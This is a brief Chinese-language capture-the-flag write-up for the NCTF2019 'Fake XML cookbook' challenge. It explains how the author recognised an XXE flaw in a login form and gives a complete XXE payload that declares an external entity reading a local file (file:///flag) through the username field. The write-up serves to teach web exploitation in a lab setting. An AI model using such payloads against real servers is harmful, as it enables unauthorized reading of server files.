[NCTF2019]Fake XML cookbook1

打开题目

猜测可能为sql注入,或者绕过,思路查看源码,看有用信息

试输入发现只会返回用户名错误,根据提示XML相对XXE攻击

首先进行抓包,然后构造payload。

复制代码
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY admin SYSTEM "file:///flag">
  ]>
<user><username>&admin;</username><password>123456</password></user>

直接就可以得到flag

相关推荐
qq_3186930118 小时前
XML 站点地图制作与提交全流程,新站收录效率提升 50%
xml·数据库·mysql
卷Java21 小时前
WXML 编译错误修复总结
xml·java·前端·微信小程序·uni-app·webview
武子康2 天前
Java-131 深入浅出 MySQL MyCat 深入解析 schema.xml 配置详解:逻辑库、逻辑表、数据节点全攻略
xml·java·数据库·mysql·性能优化·系统架构·mycat
fendouweiqian2 天前
pom.xml 不在根目录,idea无法识别项目处理方案
xml·java·intellij-idea
虾说羊3 天前
Spring注解驱动开发:从XML到注解的完美蜕变
xml·sql·spring
l1t11 天前
利用美团龙猫用libxml2编写XML转CSV文件C程序
xml·c语言·libxml2·解析器
Luna-player14 天前
某个工程 pom.xml
xml
l1t15 天前
对expat库XML_Parse函数调用优化的测试
xml·c语言·解析器·expat
l1t15 天前
利用美团龙猫添加xlsx的sheet.xml读取sharedStrings.xml中共享字符串输出到csv功能
xml·c语言·数据结构·人工智能·算法·解析器
叶 落15 天前
[Maven 基础课程]pom.xml
xml·pom.xml 常见配置项·maven 的 pom.xml